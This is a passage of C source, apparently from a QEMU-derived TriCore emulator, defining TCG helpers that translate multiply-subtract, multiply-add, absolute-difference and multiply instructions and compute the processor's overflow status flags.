tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg1); /* if we shift part of the fraction out, we need to round up */ tcg_gen_andi_i64(tcg_ctx, t4, t2, (1ll << (up_shift - n)) - 1); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t4, t4, 0); tcg_gen_sari_i64(tcg_ctx, t2, t2, up_shift - n); tcg_gen_add_i64(tcg_ctx, t2, t2, t4); tcg_gen_sub_i64(tcg_ctx, t3, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, temp3, t3); /* calc v bit */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_GT, t1, t3, 0x7fffffffLL); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LT, t2, t3, -0x80000000LL); tcg_gen_or_i64(tcg_ctx, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp3, temp3); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp3, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, temp3); 
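/* Note on the rounding above: t4 collapses every fraction bit shifted out to a single 0/1 and is added back after the arithmetic shift, so the scaled product is rounded up whenever precision was lost, before being subtracted from arg1. */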
tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t4); } static inline void gen_m16sub32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } gen_sub_d(ctx, ret, arg1, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16subs32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } gen_subs(ctx, ret, arg1, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16sub64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } tcg_gen_ext_i32_i64(tcg_ctx, t2, temp); tcg_gen_shli_i64(tcg_ctx, t2, t2, 16); tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); gen_sub64_d(ctx, t3, t1, t2); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16subs64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } tcg_gen_ext_i32_i64(tcg_ctx, t2, temp); tcg_gen_shli_i64(tcg_ctx, t2, t2, 16); tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); gen_helper_sub64_ssov(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t2); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t1); tcg_temp_free(tcg_ctx, 
temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static inline void gen_msub64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_temp_new_i64(tcg_ctx); TCGv temp, temp2; tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); if (n != 0) { tcg_gen_shli_i64(tcg_ctx, t2, t2, 1); } tcg_gen_sub_i64(tcg_ctx, t4, t1, t2); /* calc v bit */ tcg_gen_xor_i64(tcg_ctx, t3, t4, t1); tcg_gen_xor_i64(tcg_ctx, t2, t1, t2); tcg_gen_and_i64(tcg_ctx, t3, t3, t2); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t3); /* We produce an overflow on the host if the mul before was ((0x80000000 * 0x80000000) << 1). If this is the case, we negate the ovf. */ if (n == 1) { temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, arg2, 0x80000000); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, temp2, arg2, arg3); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_shli_tl(tcg_ctx, temp, temp, 31); /* negate V bit if special condition */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t4); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, rh); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t4); } static inline void gen_msubs32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg1); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); /* if we shift part of the fraction out, we need to round up */ tcg_gen_andi_i64(tcg_ctx, t4, t2, (1ll << (up_shift - n)) - 1); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t4, t4, 0); tcg_gen_sari_i64(tcg_ctx, t3, t2, up_shift - n); tcg_gen_add_i64(tcg_ctx, t3, t3, t4); gen_helper_msub32_q_sub_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, t1, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t4); } static inline void gen_msubs64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 r1 = tcg_temp_new_i64(tcg_ctx); TCGv temp = tcg_const_i32(tcg_ctx, n); tcg_gen_concat_i32_i64(tcg_ctx, r1, arg1_low, arg1_high); gen_helper_msub64_q_ssov(tcg_ctx, r1, tcg_ctx->cpu_env, r1, arg2, arg3, temp); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, r1); tcg_temp_free_i64(tcg_ctx, r1); tcg_temp_free(tcg_ctx, temp); } static inline void
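/* gen_msubad_h: multiply two halfword pairs, then add the first product into the low result word and subtract the second from the high word (op1 = tcg_gen_add_tl, op2 = tcg_gen_sub_tl in the gen_addsub64_h call below). */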
gen_msubad_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_addsub64_h(ctx, ret_low, ret_high, r1_low, r1_high, temp, temp2, tcg_gen_add_tl, tcg_gen_sub_tl); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubadm_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_3 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_3, r1_low, r1_high); tcg_gen_sari_i64(tcg_ctx, temp64_2, temp64, 32); /* high */ tcg_gen_ext32s_i64(tcg_ctx, temp64, temp64); /* low */ tcg_gen_sub_i64(tcg_ctx, temp64, temp64_2, temp64); tcg_gen_shli_i64(tcg_ctx, temp64, temp64, 16); gen_sub64_d(ctx, temp64_2, temp64_3, temp64); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64_2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); tcg_temp_free_i64(tcg_ctx, temp64_3); } static inline void gen_msubadr32_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_helper_subadr_h(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubads_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case 
MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_adds(ctx, ret_low, r1_low, temp); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, temp3, tcg_ctx->cpu_PSW_AV); gen_subs(ctx, ret_high, r1_high, temp2); /* combine v bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* combine av bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubadms_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_sari_i64(tcg_ctx, temp64_2, temp64, 32); /* high */ tcg_gen_ext32s_i64(tcg_ctx, temp64, temp64); /* low */ tcg_gen_sub_i64(tcg_ctx, temp64, temp64_2, temp64); tcg_gen_shli_i64(tcg_ctx, temp64, temp64, 16); tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_helper_sub64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, temp64_2, temp64); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); } static inline void gen_msubadr32s_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_helper_subadr_h_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_abs(DisasContext *ctx, TCGv ret, TCGv r1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_abs_tl(tcg_ctx, ret, r1); /* overflow can only happen, if r1 = 0x80000000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, r1, 0x80000000); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); } static inline void gen_absdif(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); 
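    /* absdif: compute both r1 - r2 and r2 - r1, then pick the
       non-negative difference with a conditional move on r1 > r2. */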
tcg_gen_sub_tl(tcg_ctx, result, r1, r2); tcg_gen_sub_tl(tcg_ctx, temp, r2, r1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, result, r1, r2, result, temp); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, temp, result, r2); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->cpu_PSW_V, r1, r2, tcg_ctx->cpu_PSW_V, temp); tcg_gen_xor_tl(tcg_ctx, temp, r1, r2); tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, result); } static inline void gen_absdifi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_absdif(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_absdifsi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_absdif_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mul_i32s(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv high = tcg_temp_new(tcg_ctx); TCGv low = tcg_temp_new(tcg_ctx); tcg_gen_muls2_tl(tcg_ctx, low, high, r1, r2); tcg_gen_mov_tl(tcg_ctx, ret, low); /* calc V bit */ tcg_gen_sari_tl(tcg_ctx, low, low, 31); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_PSW_V, high, low); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, high); tcg_temp_free(tcg_ctx, low); } static inline void gen_muli_i32s(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_mul_i32s(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mul_i64s(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_muls2_tl(tcg_ctx, ret_low, ret_high, r1, r2); /* clear V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); } static inline void gen_muli_i64s(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_mul_i64s(ctx, ret_low, ret_high, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mul_i64u(DisasContext *ctx, TCGv ret_low, 
TCGv ret_high, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mulu2_tl(tcg_ctx, ret_low, ret_high, r1, r2); /* clear V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); } static inline void gen_muli_i64u(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_mul_i64u(ctx, ret_low, ret_high, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mulsi_i32(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_mul_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mulsui_i32(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_mul_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } /* gen_maddsi_32(tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); */ static inline void gen_maddsi_32(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_madd32_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_maddsui_32(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_madd32_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_mul_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1, TCGv arg2, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv_i64 temp_64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp2_64 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { if (up_shift == 32) { 